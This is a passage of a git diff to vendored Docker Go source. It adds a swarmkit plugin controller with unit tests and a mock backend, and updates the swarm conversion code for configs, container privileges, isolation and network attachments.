+func NewController(backend Backend, t *api.Task) (*Controller, error) {
+	spec, err := readSpec(t)
+	if err != nil {
+		return nil, err
+	}
+	return &Controller{
+		backend:   backend,
+		spec:      spec,
+		serviceID: t.ServiceID,
+		logger: logrus.WithFields(logrus.Fields{
+			"controller": "plugin",
+			"task":       t.ID,
+			"plugin":     spec.Name,
+		})}, nil
+}
+
+func readSpec(t *api.Task) (runtime.PluginSpec, error) {
+	var cfg runtime.PluginSpec
+
+	generic := t.Spec.GetGeneric()
+	if err := proto.Unmarshal(generic.Payload.Value, &cfg); err != nil {
+		return cfg, errors.Wrap(err, "error reading plugin spec")
+	}
+	return cfg, nil
+}
+
+// Update is the update phase from swarmkit
+func (p *Controller) Update(ctx context.Context, t *api.Task) error {
+	p.logger.Debug("Update")
+	return nil
+}
+
+// Prepare is the prepare phase from swarmkit
+func (p *Controller) Prepare(ctx context.Context) (err error) {
+	p.logger.Debug("Prepare")
+
+	remote, err := reference.ParseNormalizedNamed(p.spec.Remote)
+	if err != nil {
+		return errors.Wrapf(err, "error parsing remote reference %q", p.spec.Remote)
+	}
+
+	if p.spec.Name == "" {
+		p.spec.Name = remote.String()
+	}
+
+	var authConfig enginetypes.AuthConfig
+	privs := convertPrivileges(p.spec.Privileges)
+
+	pl, err := p.backend.Get(p.spec.Name)
+
+	defer func() {
+		if pl != nil && err == nil {
+			pl.Acquire()
+		}
+	}()
+
+	if err == nil && pl != nil {
+		if pl.SwarmServiceID != p.serviceID {
+			return errors.Errorf("plugin already exists: %s", p.spec.Name)
+		}
+		if pl.IsEnabled() {
+			if err := p.backend.Disable(pl.GetID(), &enginetypes.PluginDisableConfig{ForceDisable: true}); err != nil {
+				p.logger.WithError(err).Debug("could not disable plugin before running upgrade")
+			}
+		}
+		p.pluginID = pl.GetID()
+		return p.backend.Upgrade(ctx, remote, p.spec.Name, nil, &authConfig, privs, ioutil.Discard)
+	}
+
+	if err := p.backend.Pull(ctx, remote, p.spec.Name, nil, &authConfig, privs, ioutil.Discard, plugin.WithSwarmService(p.serviceID)); err != nil {
+		return err
+	}
+	pl, err = p.backend.Get(p.spec.Name)
+	if err != nil {
+		return err
+	}
+	p.pluginID = pl.GetID()
+
+	return nil
+}
+
+// Start is the start phase from swarmkit
+func (p *Controller) Start(ctx context.Context) error {
+	p.logger.Debug("Start")
+
+	pl, err := p.backend.Get(p.pluginID)
+	if err != nil {
+		return err
+	}
+
+	if p.spec.Disabled {
+		if pl.IsEnabled() {
+			return p.backend.Disable(p.pluginID, &enginetypes.PluginDisableConfig{ForceDisable: false})
+		}
+		return nil
+	}
+	if !pl.IsEnabled() {
+		return p.backend.Enable(p.pluginID, &enginetypes.PluginEnableConfig{Timeout: 30})
+	}
+	return nil
+}
+
+// Wait causes the task to wait until returned
+func (p *Controller) Wait(ctx context.Context) error {
+	p.logger.Debug("Wait")
+
+	pl, err := p.backend.Get(p.pluginID)
+	if err != nil {
+		return err
+	}
+
+	events, cancel := p.backend.SubscribeEvents(1, plugin.EventDisable{Plugin: pl.PluginObj}, plugin.EventRemove{Plugin: pl.PluginObj}, plugin.EventEnable{Plugin: pl.PluginObj})
+	defer cancel()
+
+	if p.signalWaitReady != nil {
+		p.signalWaitReady()
+	}
+
+	if !p.spec.Disabled != pl.IsEnabled() {
+		return errors.New("mismatched plugin state")
+	}
+
+	for {
+		select {
+		case <-ctx.Done():
+			return ctx.Err()
+		case e := <-events:
+			p.logger.Debugf("got event %#T", e)
+
+			switch e.(type) {
+			case plugin.EventEnable:
+				if p.spec.Disabled {
+					return errors.New("plugin enabled")
+				}
+			case plugin.EventRemove:
+				return errors.New("plugin removed")
+			case plugin.EventDisable:
+				if !p.spec.Disabled {
+					return errors.New("plugin disabled")
+				}
+			}
+		}
+	}
+}
+
+func isNotFound(err error) bool {
+	return errdefs.IsNotFound(err)
+}
+
+// Shutdown is the shutdown phase from swarmkit
+func (p *Controller) Shutdown(ctx context.Context) error {
+	p.logger.Debug("Shutdown")
+	return nil
+}
+
+// Terminate is the terminate phase from swarmkit
+func (p *Controller) Terminate(ctx context.Context) error {
+	p.logger.Debug("Terminate")
+	return nil
+}
+
+// Remove is the remove phase from swarmkit
+func (p *Controller) Remove(ctx context.Context) error {
+	p.logger.Debug("Remove")
+
+	pl, err := p.backend.Get(p.pluginID)
+	if err != nil {
+		if isNotFound(err) {
+			return nil
+		}
+		return err
+	}
+
+	pl.Release()
+	if pl.GetRefCount() > 0 {
+		p.logger.Debug("skipping remove due to ref count")
+		return nil
+	}
+
+	// This may error because we have exactly 1 plugin, but potentially multiple
+	// tasks which are calling remove.
+	err = p.backend.Remove(p.pluginID, &enginetypes.PluginRmConfig{ForceRemove: true})
+	if isNotFound(err) {
+		return nil
+	}
+	return err
+}
+
+// Close is the close phase from swarmkit
+func (p *Controller) Close() error {
+	p.logger.Debug("Close")
+	return nil
+}
+
+func convertPrivileges(ls []*runtime.PluginPrivilege) enginetypes.PluginPrivileges {
+	var out enginetypes.PluginPrivileges
+	for _, p := range ls {
+		pp := enginetypes.PluginPrivilege{
+			Name:        p.Name,
+			Description: p.Description,
+			Value:       p.Value,
+		}
+		out = append(out, pp)
+	}
+	return out
+}
diff --git a/vendor/github.com/docker/docker/daemon/cluster/controllers/plugin/controller_test.go b/vendor/github.com/docker/docker/daemon/cluster/controllers/plugin/controller_test.go
new file mode 100644
index 0000000000..8329d44766
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/cluster/controllers/plugin/controller_test.go
@@ -0,0 +1,390 @@
+package plugin // import "github.com/docker/docker/daemon/cluster/controllers/plugin"
+
+import (
+	"context"
+	"errors"
+	"io"
+	"io/ioutil"
+	"net/http"
+	"strings"
+	"testing"
+	"time"
+
+	"github.com/docker/distribution/reference"
+	enginetypes "github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/swarm/runtime"
+	"github.com/docker/docker/pkg/pubsub"
+	"github.com/docker/docker/plugin"
+	"github.com/docker/docker/plugin/v2"
+	"github.com/sirupsen/logrus"
+)
+
+const (
+	pluginTestName          = "test"
+	pluginTestRemote        = "testremote"
+	pluginTestRemoteUpgrade = "testremote2"
+)
+
+func TestPrepare(t *testing.T) {
+	b := newMockBackend()
+	c := newTestController(b, false)
+	ctx := context.Background()
+
+	if err := c.Prepare(ctx); err != nil {
+		t.Fatal(err)
+	}
+
+	if b.p == nil {
+		t.Fatal("pull not performed")
+	}
+
+	c = newTestController(b, false)
+	if err := c.Prepare(ctx); err != nil {
+		t.Fatal(err)
+	}
+	if b.p == nil {
+		t.Fatal("unexpected nil")
+	}
+	if b.p.PluginObj.PluginReference != pluginTestRemoteUpgrade {
+		t.Fatal("upgrade not performed")
+	}
+
+	c = newTestController(b, false)
+	c.serviceID = "1"
+	if err := c.Prepare(ctx); err == nil {
+		t.Fatal("expected error on prepare")
+	}
+}
+
+func TestStart(t *testing.T) {
+	b := newMockBackend()
+	c := newTestController(b, false)
+	ctx := context.Background()
+
+	if err := c.Prepare(ctx); err != nil {
+		t.Fatal(err)
+	}
+
+	if err := c.Start(ctx); err != nil {
+		t.Fatal(err)
+	}
+
+	if !b.p.IsEnabled() {
+		t.Fatal("expected plugin to be enabled")
+	}
+
+	c = newTestController(b, true)
+	if err := c.Prepare(ctx); err != nil {
+		t.Fatal(err)
+	}
+	if err := c.Start(ctx); err != nil {
+		t.Fatal(err)
+	}
+	if b.p.IsEnabled() {
+		t.Fatal("expected plugin to be disabled")
+	}
+
+	c = newTestController(b, false)
+	if err := c.Prepare(ctx); err != nil {
+		t.Fatal(err)
+	}
+	if err := c.Start(ctx); err != nil {
+		t.Fatal(err)
+	}
+	if !b.p.IsEnabled() {
+		t.Fatal("expected plugin to be enabled")
+	}
+}
+
+func TestWaitCancel(t *testing.T) {
+	b := newMockBackend()
+	c := newTestController(b, true)
+	ctx := context.Background()
+	if err := c.Prepare(ctx); err != nil {
+		t.Fatal(err)
+	}
+	if err := c.Start(ctx); err != nil {
+		t.Fatal(err)
+	}
+
+	ctxCancel, cancel := context.WithCancel(ctx)
+	chErr := make(chan error)
+	go func() {
+		chErr <- c.Wait(ctxCancel)
+	}()
+	cancel()
+	select {
+	case err := <-chErr:
+		if err != context.Canceled {
+			t.Fatal(err)
+		}
+	case <-time.After(10 * time.Second):
+		t.Fatal("timeout waiting for cancelation")
+	}
+}
+
+func TestWaitDisabled(t *testing.T) {
+	b := newMockBackend()
+	c := newTestController(b, true)
+	ctx := context.Background()
+	if err := c.Prepare(ctx); err != nil {
+		t.Fatal(err)
+	}
+	if err := c.Start(ctx); err != nil {
+		t.Fatal(err)
+	}
+
+	chErr := make(chan error)
+	go func() {
+		chErr <- c.Wait(ctx)
+	}()
+
+	if err := b.Enable("test", nil); err != nil {
+		t.Fatal(err)
+	}
+	select {
+	case err := <-chErr:
+		if err == nil {
+			t.Fatal("expected error")
+		}
+	case <-time.After(10 * time.Second):
+		t.Fatal("timeout waiting for event")
+	}
+
+	if err := c.Start(ctx); err != nil {
+		t.Fatal(err)
+	}
+
+	ctxWaitReady, cancelCtxWaitReady := context.WithTimeout(ctx, 30*time.Second)
+	c.signalWaitReady = cancelCtxWaitReady
+	defer cancelCtxWaitReady()
+
+	go func() {
+		chErr <- c.Wait(ctx)
+	}()
+
+	chEvent, cancel := b.SubscribeEvents(1)
+	defer cancel()
+
+	if err := b.Disable("test", nil); err != nil {
+		t.Fatal(err)
+	}
+
+	select {
+	case <-chEvent:
+		<-ctxWaitReady.Done()
+		if err := ctxWaitReady.Err(); err == context.DeadlineExceeded {
+			t.Fatal(err)
+		}
+		select {
+		case <-chErr:
+			t.Fatal("wait returned unexpectedly")
+		default:
+			// all good
+		}
+	case <-chErr:
+		t.Fatal("wait returned unexpectedly")
+	case <-time.After(10 * time.Second):
+		t.Fatal("timeout waiting for event")
+	}
+
+	if err := b.Remove("test", nil); err != nil {
+		t.Fatal(err)
+	}
+	select {
+	case err := <-chErr:
+		if err == nil {
+			t.Fatal("expected error")
+		}
+		if !strings.Contains(err.Error(), "removed") {
+			t.Fatal(err)
+		}
+	case <-time.After(10 * time.Second):
+		t.Fatal("timeout waiting for event")
+	}
+}
+
+func TestWaitEnabled(t *testing.T) {
+	b := newMockBackend()
+	c := newTestController(b, false)
+	ctx := context.Background()
+	if err := c.Prepare(ctx); err != nil {
+		t.Fatal(err)
+	}
+	if err := c.Start(ctx); err != nil {
+		t.Fatal(err)
+	}
+
+	chErr := make(chan error)
+	go func() {
+		chErr <- c.Wait(ctx)
+	}()
+
+	if err := b.Disable("test", nil); err != nil {
+		t.Fatal(err)
+	}
+	select {
+	case err := <-chErr:
+		if err == nil {
+			t.Fatal("expected error")
+		}
+	case <-time.After(10 * time.Second):
+		t.Fatal("timeout waiting for event")
+	}
+
+	if err := c.Start(ctx); err != nil {
+		t.Fatal(err)
+	}
+
+	ctxWaitReady, ctxWaitCancel := context.WithCancel(ctx)
+	c.signalWaitReady = ctxWaitCancel
+	defer ctxWaitCancel()
+
+	go func() {
+		chErr <- c.Wait(ctx)
+	}()
+
+	chEvent, cancel := b.SubscribeEvents(1)
+	defer cancel()
+
+	if err := b.Enable("test", nil); err != nil {
+		t.Fatal(err)
+	}
+
+	select {
+	case <-chEvent:
+		<-ctxWaitReady.Done()
+		if err := ctxWaitReady.Err(); err == context.DeadlineExceeded {
+			t.Fatal(err)
+		}
+		select {
+		case <-chErr:
+			t.Fatal("wait returned unexpectedly")
+		default:
+			// all good
+		}
+	case <-chErr:
+		t.Fatal("wait returned unexpectedly")
+	case <-time.After(10 * time.Second):
+		t.Fatal("timeout waiting for event")
+	}
+
+	if err := b.Remove("test", nil); err != nil {
+		t.Fatal(err)
+	}
+	select {
+	case err := <-chErr:
+		if err == nil {
+			t.Fatal("expected error")
+		}
+		if !strings.Contains(err.Error(), "removed") {
+			t.Fatal(err)
+		}
+	case <-time.After(10 * time.Second):
+		t.Fatal("timeout waiting for event")
+	}
+}
+
+func TestRemove(t *testing.T) {
+	b := newMockBackend()
+	c := newTestController(b, false)
+	ctx := context.Background()
+
+	if err := c.Prepare(ctx); err != nil {
+		t.Fatal(err)
+	}
+	if err := c.Shutdown(ctx); err != nil {
+		t.Fatal(err)
+	}
+
+	c2 := newTestController(b, false)
+	if err := c2.Prepare(ctx); err != nil {
+		t.Fatal(err)
+	}
+
+	if err := c.Remove(ctx); err != nil {
+		t.Fatal(err)
+	}
+	if b.p == nil {
+		t.Fatal("plugin removed unexpectedly")
+	}
+	if err := c2.Shutdown(ctx); err != nil {
+		t.Fatal(err)
+	}
+	if err := c2.Remove(ctx); err != nil {
+		t.Fatal(err)
+	}
+	if b.p != nil {
+		t.Fatal("expected plugin to be removed")
+	}
+}
+
+func newTestController(b Backend, disabled bool) *Controller {
+	return &Controller{
+		logger:  &logrus.Entry{Logger: &logrus.Logger{Out: ioutil.Discard}},
+		backend: b,
+		spec: runtime.PluginSpec{
+			Name:     pluginTestName,
+			Remote:   pluginTestRemote,
+			Disabled: disabled,
+		},
+	}
+}
+
+func newMockBackend() *mockBackend {
+	return &mockBackend{
+		pub: pubsub.NewPublisher(0, 0),
+	}
+}
+
+type mockBackend struct {
+	p   *v2.Plugin
+	pub *pubsub.Publisher
+}
+
+func (m *mockBackend) Disable(name string, config *enginetypes.PluginDisableConfig) error {
+	m.p.PluginObj.Enabled = false
+	m.pub.Publish(plugin.EventDisable{})
+	return nil
+}
+
+func (m *mockBackend) Enable(name string, config *enginetypes.PluginEnableConfig) error {
+	m.p.PluginObj.Enabled = true
+	m.pub.Publish(plugin.EventEnable{})
+	return nil
+}
+
+func (m *mockBackend) Remove(name string, config *enginetypes.PluginRmConfig) error {
+	m.p = nil
+	m.pub.Publish(plugin.EventRemove{})
+	return nil
+}
+
+func (m *mockBackend) Pull(ctx context.Context, ref reference.Named, name string, metaHeaders http.Header, authConfig *enginetypes.AuthConfig, privileges enginetypes.PluginPrivileges, outStream io.Writer, opts ...plugin.CreateOpt) error {
+	m.p = &v2.Plugin{
+		PluginObj: enginetypes.Plugin{
+			ID:              "1234",
+			Name:            name,
+			PluginReference: ref.String(),
+		},
+	}
+	return nil
+}
+
+func (m *mockBackend) Upgrade(ctx context.Context, ref reference.Named, name string, metaHeaders http.Header, authConfig *enginetypes.AuthConfig, privileges enginetypes.PluginPrivileges, outStream io.Writer) error {
+	m.p.PluginObj.PluginReference = pluginTestRemoteUpgrade
+	return nil
+}
+
+func (m *mockBackend) Get(name string) (*v2.Plugin, error) {
+	if m.p == nil {
+		return nil, errors.New("not found")
+	}
+	return m.p, nil
+}
+
+func (m *mockBackend) SubscribeEvents(buffer int, events ...plugin.Event) (eventCh <-chan interface{}, cancel func()) {
+	ch := m.pub.SubscribeTopicWithBuffer(nil, buffer)
+	cancel = func() { m.pub.Evict(ch) }
+	return ch, cancel
+}
diff --git a/vendor/github.com/docker/docker/daemon/cluster/convert/config.go b/vendor/github.com/docker/docker/daemon/cluster/convert/config.go
new file mode 100644
index 0000000000..16b3475af8
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/cluster/convert/config.go
@@ -0,0 +1,78 @@
+package convert // import "github.com/docker/docker/daemon/cluster/convert"
+
+import (
+	swarmtypes "github.com/docker/docker/api/types/swarm"
+	types "github.com/docker/docker/api/types/swarm"
+	swarmapi "github.com/docker/swarmkit/api"
+	gogotypes "github.com/gogo/protobuf/types"
+)
+
+// ConfigFromGRPC converts a grpc Config to a Config.
+func ConfigFromGRPC(s *swarmapi.Config) swarmtypes.Config {
+	config := swarmtypes.Config{
+		ID: s.ID,
+		Spec: swarmtypes.ConfigSpec{
+			Annotations: annotationsFromGRPC(s.Spec.Annotations),
+			Data:        s.Spec.Data,
+		},
+	}
+
+	config.Version.Index = s.Meta.Version.Index
+	// Meta
+	config.CreatedAt, _ = gogotypes.TimestampFromProto(s.Meta.CreatedAt)
+	config.UpdatedAt, _ = gogotypes.TimestampFromProto(s.Meta.UpdatedAt)
+
+	if s.Spec.Templating != nil {
+		config.Spec.Templating = &types.Driver{
+			Name:    s.Spec.Templating.Name,
+			Options: s.Spec.Templating.Options,
+		}
+	}
+
+	return config
+}
+
+// ConfigSpecToGRPC converts Config to a grpc Config.
+func ConfigSpecToGRPC(s swarmtypes.ConfigSpec) swarmapi.ConfigSpec {
+	spec := swarmapi.ConfigSpec{
+		Annotations: swarmapi.Annotations{
+			Name:   s.Name,
+			Labels: s.Labels,
+		},
+		Data: s.Data,
+	}
+
+	if s.Templating != nil {
+		spec.Templating = &swarmapi.Driver{
+			Name:    s.Templating.Name,
+			Options: s.Templating.Options,
+		}
+	}
+
+	return spec
+}
+
+// ConfigReferencesFromGRPC converts a slice of grpc ConfigReference to ConfigReference
+func ConfigReferencesFromGRPC(s []*swarmapi.ConfigReference) []*swarmtypes.ConfigReference {
+	refs := []*swarmtypes.ConfigReference{}
+
+	for _, r := range s {
+		ref := &swarmtypes.ConfigReference{
+			ConfigID:   r.ConfigID,
+			ConfigName: r.ConfigName,
+		}
+
+		if t, ok := r.Target.(*swarmapi.ConfigReference_File); ok {
+			ref.File = &swarmtypes.ConfigReferenceFileTarget{
+				Name: t.File.Name,
+				UID:  t.File.UID,
+				GID:  t.File.GID,
+				Mode: t.File.Mode,
+			}
+		}
+
+		refs = append(refs, ref)
+	}
+
+	return refs
+}
diff --git a/vendor/github.com/docker/docker/daemon/cluster/convert/container.go b/vendor/github.com/docker/docker/daemon/cluster/convert/container.go
index 10383f749b..d889b4004c 100644
--- a/vendor/github.com/docker/docker/daemon/cluster/convert/container.go
+++ b/vendor/github.com/docker/docker/daemon/cluster/convert/container.go
@@ -1,32 +1,41 @@
-package convert
+package convert // import "github.com/docker/docker/daemon/cluster/convert"
 
 import (
+	"errors"
 	"fmt"
 	"strings"
 
-	"github.com/Sirupsen/logrus"
-	container "github.com/docker/docker/api/types/container"
+	"github.com/docker/docker/api/types/container"
 	mounttypes "github.com/docker/docker/api/types/mount"
 	types "github.com/docker/docker/api/types/swarm"
 	swarmapi "github.com/docker/swarmkit/api"
-	"github.com/docker/swarmkit/protobuf/ptypes"
+	gogotypes "github.com/gogo/protobuf/types"
+	"github.com/sirupsen/logrus"
 )
 
-func containerSpecFromGRPC(c *swarmapi.ContainerSpec) types.ContainerSpec {
-	containerSpec := types.ContainerSpec{
-		Image:     c.Image,
-		Labels:    c.Labels,
-		Command:   c.Command,
-		Args:      c.Args,
-		Hostname:  c.Hostname,
-		Env:       c.Env,
-		Dir:       c.Dir,
-		User:      c.User,
-		Groups:    c.Groups,
-		TTY:       c.TTY,
-		OpenStdin: c.OpenStdin,
-		Hosts:     c.Hosts,
-		Secrets:   secretReferencesFromGRPC(c.Secrets),
+func containerSpecFromGRPC(c *swarmapi.ContainerSpec) *types.ContainerSpec {
+	if c == nil {
+		return nil
+	}
+	containerSpec := &types.ContainerSpec{
+		Image:      c.Image,
+		Labels:     c.Labels,
+		Command:    c.Command,
+		Args:       c.Args,
+		Hostname:   c.Hostname,
+		Env:        c.Env,
+		Dir:        c.Dir,
+		User:       c.User,
+		Groups:     c.Groups,
+		StopSignal: c.StopSignal,
+		TTY:        c.TTY,
+		OpenStdin:  c.OpenStdin,
+		ReadOnly:   c.ReadOnly,
+		Hosts:      c.Hosts,
+		Secrets:    secretReferencesFromGRPC(c.Secrets),
+		Configs:    configReferencesFromGRPC(c.Configs),
+		Isolation:  IsolationFromGRPC(c.Isolation),
+		Init:       initFromGRPC(c.Init),
 	}
 
 	if c.DNSConfig != nil {
@@ -37,6 +46,31 @@ func containerSpecFromGRPC(c *swarmapi.ContainerSpec) types.ContainerSpec {
 		}
 	}
 
+	// Privileges
+	if c.Privileges != nil {
+		containerSpec.Privileges = &types.Privileges{}
+
+		if c.Privileges.CredentialSpec != nil {
+			containerSpec.Privileges.CredentialSpec = &types.CredentialSpec{}
+			switch c.Privileges.CredentialSpec.Source.(type) {
+			case *swarmapi.Privileges_CredentialSpec_File:
+				containerSpec.Privileges.CredentialSpec.File = c.Privileges.CredentialSpec.GetFile()
+			case *swarmapi.Privileges_CredentialSpec_Registry:
+				containerSpec.Privileges.CredentialSpec.Registry = c.Privileges.CredentialSpec.GetRegistry()
+			}
+		}
+
+		if c.Privileges.SELinuxContext != nil {
+			containerSpec.Privileges.SELinuxContext = &types.SELinuxContext{
+				Disable: c.Privileges.SELinuxContext.Disable,
+				User:    c.Privileges.SELinuxContext.User,
+				Type:    c.Privileges.SELinuxContext.Type,
+				Role:    c.Privileges.SELinuxContext.Role,
+				Level:   c.Privileges.SELinuxContext.Level,
+			}
+		}
+	}
+
 	// Mounts
 	for _, m := range c.Mounts {
 		mount := mounttypes.Mount{
@@ -75,7 +109,7 @@ func containerSpecFromGRPC(c *swarmapi.ContainerSpec) types.ContainerSpec {
 	}
 
 	if c.StopGracePeriod != nil {
-		grace, _ := ptypes.Duration(c.StopGracePeriod)
+		grace, _ := gogotypes.DurationFromProto(c.StopGracePeriod)
 		containerSpec.StopGracePeriod = &grace
 	}
 
@@ -86,6 +120,21 @@ func containerSpecFromGRPC(c *swarmapi.ContainerSpec) types.ContainerSpec {
 	return containerSpec
 }
 
+func initFromGRPC(v *gogotypes.BoolValue) *bool {
+	if v == nil {
+		return nil
+	}
+	value := v.GetValue()
+	return &value
+}
+
+func initToGRPC(v *bool) *gogotypes.BoolValue {
+	if v == nil {
+		return nil
+	}
+	return &gogotypes.BoolValue{Value: *v}
+}
+
 func secretReferencesToGRPC(sr []*types.SecretReference) []*swarmapi.SecretReference {
 	refs := make([]*swarmapi.SecretReference, 0, len(sr))
 	for _, s := range sr {
@@ -95,7 +144,7 @@ func secretReferencesToGRPC(sr []*types.SecretReference) []*swarmapi.SecretRefer
 		}
 		if s.File != nil {
 			ref.Target = &swarmapi.SecretReference_File{
-				File: &swarmapi.SecretReference_FileTarget{
+				File: &swarmapi.FileTarget{
 					Name: s.File.Name,
 					UID:  s.File.UID,
 					GID:  s.File.GID,
@@ -109,6 +158,7 @@ func secretReferencesToGRPC(sr []*types.SecretReference) []*swarmapi.SecretRefer
 
 	return refs
 }
+
 func secretReferencesFromGRPC(sr []*swarmapi.SecretReference) []*types.SecretReference {
 	refs := make([]*types.SecretReference, 0, len(sr))
 	for _, s := range sr {
@@ -133,21 +183,74 @@ func secretReferencesFromGRPC(sr []*swarmapi.SecretReference) []*types.SecretRef
 	return refs
 }
 
-func containerToGRPC(c types.ContainerSpec) (*swarmapi.ContainerSpec, error) {
+func configReferencesToGRPC(sr []*types.ConfigReference) []*swarmapi.ConfigReference {
+	refs := make([]*swarmapi.ConfigReference, 0, len(sr))
+	for _, s := range sr {
+		ref := &swarmapi.ConfigReference{
+			ConfigID:   s.ConfigID,
+			ConfigName: s.ConfigName,
+		}
+		if s.File != nil {
+			ref.Target = &swarmapi.ConfigReference_File{
+				File: &swarmapi.FileTarget{
+					Name: s.File.Name,
+					UID:  s.File.UID,
+					GID:  s.File.GID,
+					Mode: s.File.Mode,
+				},
+			}
+		}
+
+		refs = append(refs, ref)
+	}
+
+	return refs
+}
+
+func configReferencesFromGRPC(sr []*swarmapi.ConfigReference) []*types.ConfigReference {
+	refs := make([]*types.ConfigReference, 0, len(sr))
+	for _, s := range sr {
+		target := s.GetFile()
+		if target == nil {
+			// not a file target
+			logrus.Warnf("config target not a file: config=%s", s.ConfigID)
+			continue
+		}
+		refs = append(refs, &types.ConfigReference{
+			File: &types.ConfigReferenceFileTarget{
+				Name: target.Name,
+				UID:  target.UID,
+				GID:  target.GID,
+				Mode: target.Mode,
+			},
+			ConfigID:   s.ConfigID,
+			ConfigName: s.ConfigName,
+		})
+	}
+
+	return refs
+}
+
+func containerToGRPC(c *types.ContainerSpec) (*swarmapi.ContainerSpec, error) {
 	containerSpec := &swarmapi.ContainerSpec{
-		Image:     c.Image,
-		Labels:    c.Labels,
-		Command:   c.Command,
-		Args:      c.Args,
-		Hostname:  c.Hostname,
-		Env:       c.Env,
-		Dir:       c.Dir,
-		User:      c.User,
-		Groups:    c.Groups,
-		TTY:       c.TTY,
-		OpenStdin: c.OpenStdin,
-		Hosts:     c.Hosts,
-		Secrets:   secretReferencesToGRPC(c.Secrets),
+		Image:      c.Image,
+		Labels:     c.Labels,
+		Command:    c.Command,
+		Args:       c.Args,
+		Hostname:   c.Hostname,
+		Env:        c.Env,
+		Dir:        c.Dir,
+		User:       c.User,
+		Groups:     c.Groups,
+		StopSignal: c.StopSignal,
+		TTY:        c.TTY,
+		OpenStdin:  c.OpenStdin,
+		ReadOnly:   c.ReadOnly,
+		Hosts:      c.Hosts,
+		Secrets:    secretReferencesToGRPC(c.Secrets),
+		Configs:    configReferencesToGRPC(c.Configs),
+		Isolation:  isolationToGRPC(c.Isolation),
+		Init:       initToGRPC(c.Init),
 	}
 
 	if c.DNSConfig != nil {
@@ -159,7 +262,41 @@ func containerToGRPC(c types.ContainerSpec) (*swarmapi.ContainerSpec, error) {
 	}
 
 	if c.StopGracePeriod != nil {
-		containerSpec.StopGracePeriod = ptypes.DurationProto(*c.StopGracePeriod)
+		containerSpec.StopGracePeriod = gogotypes.DurationProto(*c.StopGracePeriod)
+	}
+
+	// Privileges
+	if c.Privileges != nil {
+		containerSpec.Privileges = &swarmapi.Privileges{}
+
+		if c.Privileges.CredentialSpec != nil {
+			containerSpec.Privileges.CredentialSpec = &swarmapi.Privileges_CredentialSpec{}
+
+			if c.Privileges.CredentialSpec.File != "" && c.Privileges.CredentialSpec.Registry != "" {
+				return nil, errors.New("cannot specify both \"file\" and \"registry\" credential specs")
+			}
+			if c.Privileges.CredentialSpec.File != "" {
+				containerSpec.Privileges.CredentialSpec.Source = &swarmapi.Privileges_CredentialSpec_File{
+					File: c.Privileges.CredentialSpec.File,
+				}
+			} else if c.Privileges.CredentialSpec.Registry != "" {
+				containerSpec.Privileges.CredentialSpec.Source = &swarmapi.Privileges_CredentialSpec_Registry{
+					Registry: c.Privileges.CredentialSpec.Registry,
+				}
+			} else {
+				return nil, errors.New("must either provide \"file\" or \"registry\" for credential spec")
+			}
+		}
+
+		if c.Privileges.SELinuxContext != nil {
+			containerSpec.Privileges.SELinuxContext = &swarmapi.Privileges_SELinuxContext{
+				Disable: c.Privileges.SELinuxContext.Disable,
+				User:    c.Privileges.SELinuxContext.User,
+				Type:    c.Privileges.SELinuxContext.Type,
+				Role:    c.Privileges.SELinuxContext.Role,
+				Level:   c.Privileges.SELinuxContext.Level,
+			}
+		}
 	}
 
 	// Mounts
@@ -215,21 +352,47 @@ func containerToGRPC(c types.ContainerSpec) (*swarmapi.ContainerSpec, error) {
 }
 
 func healthConfigFromGRPC(h *swarmapi.HealthConfig) *container.HealthConfig {
-	interval, _ := ptypes.Duration(h.Interval)
-	timeout, _ := ptypes.Duration(h.Timeout)
+	interval, _ := gogotypes.DurationFromProto(h.Interval)
+	timeout, _ := gogotypes.DurationFromProto(h.Timeout)
+	startPeriod, _ := gogotypes.DurationFromProto(h.StartPeriod)
 	return &container.HealthConfig{
-		Test:     h.Test,
-		Interval: interval,
-		Timeout:  timeout,
-		Retries:  int(h.Retries),
+		Test:        h.Test,
+		Interval:    interval,
+		Timeout:     timeout,
+		Retries:     int(h.Retries),
+		StartPeriod: startPeriod,
 	}
 }
 
 func healthConfigToGRPC(h *container.HealthConfig) *swarmapi.HealthConfig {
 	return &swarmapi.HealthConfig{
-		Test:     h.Test,
-		Interval: ptypes.DurationProto(h.Interval),
-		Timeout:  ptypes.DurationProto(h.Timeout),
-		Retries:  int32(h.Retries),
+		Test:        h.Test,
+		Interval:    gogotypes.DurationProto(h.Interval),
+		Timeout:     gogotypes.DurationProto(h.Timeout),
+		Retries:     int32(h.Retries),
+		StartPeriod: gogotypes.DurationProto(h.StartPeriod),
+	}
+}
+
+// IsolationFromGRPC converts a swarm api container isolation to a moby isolation representation
+func IsolationFromGRPC(i swarmapi.ContainerSpec_Isolation) container.Isolation {
+	switch i {
+	case swarmapi.ContainerIsolationHyperV:
+		return container.IsolationHyperV
+	case swarmapi.ContainerIsolationProcess:
+		return container.IsolationProcess
+	case swarmapi.ContainerIsolationDefault:
+		return container.IsolationDefault
+	}
+	return container.IsolationEmpty
+}
+
+func isolationToGRPC(i container.Isolation) swarmapi.ContainerSpec_Isolation {
+	if i.IsHyperV() {
+		return swarmapi.ContainerIsolationHyperV
+	}
+	if i.IsProcess() {
+		return swarmapi.ContainerIsolationProcess
 	}
+	return swarmapi.ContainerIsolationDefault
 }
diff --git a/vendor/github.com/docker/docker/daemon/cluster/convert/network.go b/vendor/github.com/docker/docker/daemon/cluster/convert/network.go
index 4d21b4df0a..34660fc4ff 100644
--- a/vendor/github.com/docker/docker/daemon/cluster/convert/network.go
+++ b/vendor/github.com/docker/docker/daemon/cluster/convert/network.go
@@ -1,4 +1,4 @@
-package convert
+package convert // import "github.com/docker/docker/daemon/cluster/convert"
 
 import (
 	"strings"
@@ -6,11 +6,12 @@ import (
 	basictypes "github.com/docker/docker/api/types"
 	networktypes "github.com/docker/docker/api/types/network"
 	types "github.com/docker/docker/api/types/swarm"
+	netconst "github.com/docker/libnetwork/datastore"
 	swarmapi "github.com/docker/swarmkit/api"
-	"github.com/docker/swarmkit/protobuf/ptypes"
+	gogotypes "github.com/gogo/protobuf/types"
 )
 
-func networkAttachementFromGRPC(na *swarmapi.NetworkAttachment) types.NetworkAttachment {
+func networkAttachmentFromGRPC(na *swarmapi.NetworkAttachment) types.NetworkAttachment {
 	if na != nil {
 		return types.NetworkAttachment{
 			Network:   networkFromGRPC(na.Network),
@@ -28,19 +29,26 @@ func networkFromGRPC(n *swarmapi.Network) types.Network {
 				IPv6Enabled: n.Spec.Ipv6Enabled,
 				Internal:    n.Spec.Internal,
 				Attachable:  n.Spec.Attachable,
+				Ingress:     IsIngressNetwork(n),
